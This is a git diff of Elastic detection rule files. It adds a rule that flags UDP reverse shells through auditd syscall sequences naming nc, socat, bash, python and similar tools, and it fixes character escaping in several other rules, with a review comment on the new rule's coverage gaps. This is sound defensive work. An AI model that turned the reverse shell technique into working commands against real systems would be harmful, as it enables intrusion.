@@ -0,0 +1,138 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This detection rule identifies suspicious network traffic patterns associated with UDP reverse shell activity. This activity consists of a sample of an execve, socket and connect syscall executed by the same process, where the auditd.data.a0-1 indicate a UDP connection, ending with an egress connection event. An attacker may establish a Linux UDP reverse shell to bypass traditional firewall restrictions and gain remote access to a target system covertly.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Reverse Shell via UDP", + "query": "sample by host.id, process.pid, process.parent.pid\n[process where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and \n auditd.data.syscall == \"execve\" and process.name : (\"bash\", \"dash\", \"sh\", \"tcsh\",\n \"csh\", \"zsh\", \"ksh\", \"fish\", \"perl\", \"python*\", \"nc\", \"ncat\", \"netcat\", \"php*\", \"ruby\",\n \"openssl\", \"awk\", \"telnet\", \"lua*\", \"socat\")]\n[process where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and \n auditd.data.syscall == \"socket\" and process.name : (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\",\n \"zsh\", \"ksh\", \"fish\", \"perl\", \"python*\", \"nc\", \"ncat\", \"netcat\", \"php*\", \"ruby\", \"openssl\",\n \"awk\", \"telnet\", \"lua*\", \"socat\") and auditd.data.a0 == \"2\" and auditd.data.a1 : (\"2\", \"802\")]\n[network where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and \n auditd.data.syscall == \"connect\" and process.name : (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\",\n \"zsh\", \"ksh\", \"fish\", \"perl\", \"python*\", \"nc\", \"ncat\", \"netcat\", \"php*\", \"ruby\", \"openssl\",\n \"awk\", \"telnet\", \"lua*\", \"socat\") and network.direction == \"egress\" and destination.ip != 
null and \n destination.ip != \"127.0.0.1\" and destination.ip != \"127.0.0.53\" and destination.ip != \"::1\"]\n", + "references": [ + "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" + ], + "related_integrations": [ + { + "integration": "auditd", + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.a0", + "type": "unknown" + }, + { + "ecs": false, + "name": "auditd.data.a1", + "type": "unknown" + }, + { + "ecs": false, + "name": "auditd.data.syscall", + "type": "keyword" + }, + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.pid", + "type": "long" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + } + ], + "risk_score": 47, + "rule_id": "a5eb21b7-13cc-4b94-9fe2-29bb2914e037", + "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Auditbeat\n- Auditd Manager\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" on a Linux System:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and receives events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule no additional audit rules are required to be added to the integration.\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": 
"T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 4 + }, + "id": "a5eb21b7-13cc-4b94-9fe2-29bb2914e037_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a60326d7-dca7-4fb7-93eb-1ca03a1febbd_105.json b/packages/security_detection_engine/kibana/security_rule/a60326d7-dca7-4fb7-93eb-1ca03a1febbd_105.json index 8f3b3f7e3bc..4700329397a 100644 --- a/packages/security_detection_engine/kibana/security_rule/a60326d7-dca7-4fb7-93eb-1ca03a1febbd_105.json +++ b/packages/security_detection_engine/kibana/security_rule/a60326d7-dca7-4fb7-93eb-1ca03a1febbd_105.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/a60326d7-dca7-4fb7-93eb-1ca03a1febbd_106.json b/packages/security_detection_engine/kibana/security_rule/a60326d7-dca7-4fb7-93eb-1ca03a1febbd_106.json index c007c86f791..069235cd319 100644 --- a/packages/security_detection_engine/kibana/security_rule/a60326d7-dca7-4fb7-93eb-1ca03a1febbd_106.json +++ b/packages/security_detection_engine/kibana/security_rule/a60326d7-dca7-4fb7-93eb-1ca03a1febbd_106.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", 
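Review bot: The new rule version lists `auditbeat-*` in `index` and its `setup` text says data may come from Auditbeat, yet every stage of `query` requires `event.dataset == "auditd_manager.auditd"`, so events shipped by Auditbeat will never match unless they carry that exact dataset value (I would not expect them to); either the filter should admit both sources or the Auditbeat index pattern and setup section should be dropped, otherwise the rule silently covers less than its setup promises. A smaller coverage inconsistency: the socket stage pins `auditd.data.a0 == "2"` (AF_INET) while the connect stage excludes `::1`, an address only reachable through an AF_INET6 socket, so that exclusion is effectively dead and IPv6 UDP connections fall outside the rule's scope — worth stating in `description` or widening the `a0` filter if IPv6 is intended. The `setup` value also opens with `\n` and ends with `\n\n`, which renders as blank leading and trailing lines in Kibana; trimming them would match the other rule files in this package. The hunk is a whole new file, so no enclosing block is cut.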
diff --git a/packages/security_detection_engine/kibana/security_rule/a60326d7-dca7-4fb7-93eb-1ca03a1febbd_107.json b/packages/security_detection_engine/kibana/security_rule/a60326d7-dca7-4fb7-93eb-1ca03a1febbd_107.json
index 157c76fae1b..6fd965b6bc4 100644
--- a/packages/security_detection_engine/kibana/security_rule/a60326d7-dca7-4fb7-93eb-1ca03a1febbd_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/a60326d7-dca7-4fb7-93eb-1ca03a1febbd_107.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/a60326d7-dca7-4fb7-93eb-1ca03a1febbd_208.json b/packages/security_detection_engine/kibana/security_rule/a60326d7-dca7-4fb7-93eb-1ca03a1febbd_208.json
index 81bf44f4f08..dd6a5ae006c 100644
--- a/packages/security_detection_engine/kibana/security_rule/a60326d7-dca7-4fb7-93eb-1ca03a1febbd_208.json
+++ b/packages/security_detection_engine/kibana/security_rule/a60326d7-dca7-4fb7-93eb-1ca03a1febbd_208.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/a605c51a-73ad-406d-bf3a-f24cc41d5c97_104.json b/packages/security_detection_engine/kibana/security_rule/a605c51a-73ad-406d-bf3a-f24cc41d5c97_104.json
index 53fac43041c..5d088821f31 100644
--- a/packages/security_detection_engine/kibana/security_rule/a605c51a-73ad-406d-bf3a-f24cc41d5c97_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/a605c51a-73ad-406d-bf3a-f24cc41d5c97_104.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/a605c51a-73ad-406d-bf3a-f24cc41d5c97_105.json b/packages/security_detection_engine/kibana/security_rule/a605c51a-73ad-406d-bf3a-f24cc41d5c97_105.json
index 6f9c3d45e8b..b1f686b083d 100644
--- a/packages/security_detection_engine/kibana/security_rule/a605c51a-73ad-406d-bf3a-f24cc41d5c97_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/a605c51a-73ad-406d-bf3a-f24cc41d5c97_105.json
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/a61809f3-fb5b-465c-8bff-23a8a068ac60_1.json b/packages/security_detection_engine/kibana/security_rule/a61809f3-fb5b-465c-8bff-23a8a068ac60_1.json
index c27a0d53e9b..0cab901463f 100644
--- a/packages/security_detection_engine/kibana/security_rule/a61809f3-fb5b-465c-8bff-23a8a068ac60_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/a61809f3-fb5b-465c-8bff-23a8a068ac60_1.json
@@ -113,7 +113,7 @@
 ]
 }
 ],
- "threat_query": "@timestamp \u003e= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.registry.path:* and not labels.is_ioc_transform_source:\"true\"",
+ "threat_query": "@timestamp >= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.registry.path:* and not labels.is_ioc_transform_source:\"true\"",
 "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e",
 "timeline_title": "Generic Threat Match Timeline",
 "type": "threat_match",
diff --git a/packages/security_detection_engine/kibana/security_rule/a61809f3-fb5b-465c-8bff-23a8a068ac60_2.json b/packages/security_detection_engine/kibana/security_rule/a61809f3-fb5b-465c-8bff-23a8a068ac60_2.json
index 59ee1b0755f..ab16f02b7d3 100644
--- a/packages/security_detection_engine/kibana/security_rule/a61809f3-fb5b-465c-8bff-23a8a068ac60_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/a61809f3-fb5b-465c-8bff-23a8a068ac60_2.json 
@@ -16,7 +16,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Threat Intel Windows Registry Indicator Match", - "note": "## Triage and Analysis\n\n### Investigating Threat Intel Windows Registry Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index. \n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when a Windows registry indicator from the Threat Intel Filebeat module or a threat intelligence integration matches against an event that contains registry data.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Check related threat reports to gain context about the registry indicator of compromise (IoC) and to understand if it's a system-native mechanism abused for persistence, to store data, to disable security mechanisms, etc. Use this information to define the appropriate triage and respond steps.\n- Identify the process responsible for the registry operation and investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Retrieve the involved process executable and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- Adversaries can leverage dual-use registry mechanisms that are commonly used by normal applications. 
These registry keys can be added into indicator lists creating the potential for false positives.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThis rule needs threat intelligence indicators to work. 
Threat intelligence indicators can be collected using an [Elastic Agent integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#agent-ti-integration), the [Threat Intel module](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#ti-mod-integration), or a [custom integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#custom-ti-integration).\n\nMore information can be found [here](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html).", + "note": "## Triage and Analysis\n\n### Investigating Threat Intel Windows Registry Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index. \n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when a Windows registry indicator from the Threat Intel Filebeat module or a threat intelligence integration matches against an event that contains registry data.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Check related threat reports to gain context about the registry indicator of compromise (IoC) and to understand if it's a system-native mechanism abused for persistence, to store data, to disable security mechanisms, etc. Use this information to define the appropriate triage and respond steps.\n- Identify the process responsible for the registry operation and investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Retrieve the involved process executable and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- Adversaries can leverage dual-use registry mechanisms that are commonly used by normal applications. 
These registry keys can be added into indicator lists creating the potential for false positives.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThis rule needs threat intelligence indicators to work. Threat intelligence indicators can be collected using an [Elastic Agent integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#agent-ti-integration), the [Threat Intel module](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#ti-mod-integration), or a [custom integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#custom-ti-integration).\n\nMore information can be found [here](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html).", "query": "registry.path:*\n", "references": [ "https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-threatintel.html", 
@@ -115,7 +115,7 @@ ] } ], - "threat_query": "@timestamp \u003e= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.registry.path:* and not labels.is_ioc_transform_source:\"true\"", + "threat_query": "@timestamp >= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.registry.path:* and not labels.is_ioc_transform_source:\"true\"", "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e", "timeline_title": "Generic Threat Match Timeline", "type": "threat_match", diff --git a/packages/security_detection_engine/kibana/security_rule/a61809f3-fb5b-465c-8bff-23a8a068ac60_3.json b/packages/security_detection_engine/kibana/security_rule/a61809f3-fb5b-465c-8bff-23a8a068ac60_3.json index 434d88ff4cb..a31c3652ac0 100644 --- a/packages/security_detection_engine/kibana/security_rule/a61809f3-fb5b-465c-8bff-23a8a068ac60_3.json +++ b/packages/security_detection_engine/kibana/security_rule/a61809f3-fb5b-465c-8bff-23a8a068ac60_3.json 
@@ -16,7 +16,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Threat Intel Windows Registry Indicator Match", - "note": "## Triage and Analysis\n\n### Investigating Threat Intel Windows Registry Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index. \n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when a Windows registry indicator from the Threat Intel Filebeat module or a threat intelligence integration matches against an event that contains registry data.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Check related threat reports to gain context about the registry indicator of compromise (IoC) and to understand if it's a system-native mechanism abused for persistence, to store data, to disable security mechanisms, etc. Use this information to define the appropriate triage and respond steps.\n- Identify the process responsible for the registry operation and investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Retrieve the involved process executable and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path 
WHERE authenticode.result != 'trusted'\\n\"}}\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- Adversaries can leverage dual-use registry mechanisms that are commonly used by normal applications. These registry keys can be added into indicator lists creating the potential for false positives.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThis rule needs threat intelligence indicators to work. 
Threat intelligence indicators can be collected using an [Elastic Agent integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#agent-ti-integration), the [Threat Intel module](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#ti-mod-integration), or a [custom integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#custom-ti-integration).\n\nMore information can be found [here](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html).", + "note": "## Triage and Analysis\n\n### Investigating Threat Intel Windows Registry Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index. \n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when a Windows registry indicator from the Threat Intel Filebeat module or a threat intelligence integration matches against an event that contains registry data.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Check related threat reports to gain context about the registry indicator of compromise (IoC) and to understand if it's a system-native mechanism abused for persistence, to store data, to disable security mechanisms, etc. Use this information to define the appropriate triage and respond steps.\n- Identify the process responsible for the registry operation and investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Retrieve the involved process executable and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account 
FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- Adversaries can leverage dual-use registry mechanisms that are commonly used by normal applications. These registry keys can be added into indicator lists creating the potential for false positives.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThis rule needs threat intelligence indicators to work. Threat intelligence indicators can be collected using an [Elastic Agent integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#agent-ti-integration), the [Threat Intel module](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#ti-mod-integration), or a [custom integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#custom-ti-integration).\n\nMore information can be found [here](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html).", "query": "registry.path:*\n", "references": [ "https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-threatintel.html", @@ -115,7 +115,7 @@ ] } ], - "threat_query": "@timestamp \u003e= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.registry.path:* and not labels.is_ioc_transform_source:\"true\"", + "threat_query": "@timestamp >= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.registry.path:* and not labels.is_ioc_transform_source:\"true\"", "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e", "timeline_title": "Generic Threat Match Timeline", "type": "threat_match", diff --git a/packages/security_detection_engine/kibana/security_rule/a61809f3-fb5b-465c-8bff-23a8a068ac60_4.json b/packages/security_detection_engine/kibana/security_rule/a61809f3-fb5b-465c-8bff-23a8a068ac60_4.json index afd808c0992..7be4f3f7fdb 100644 
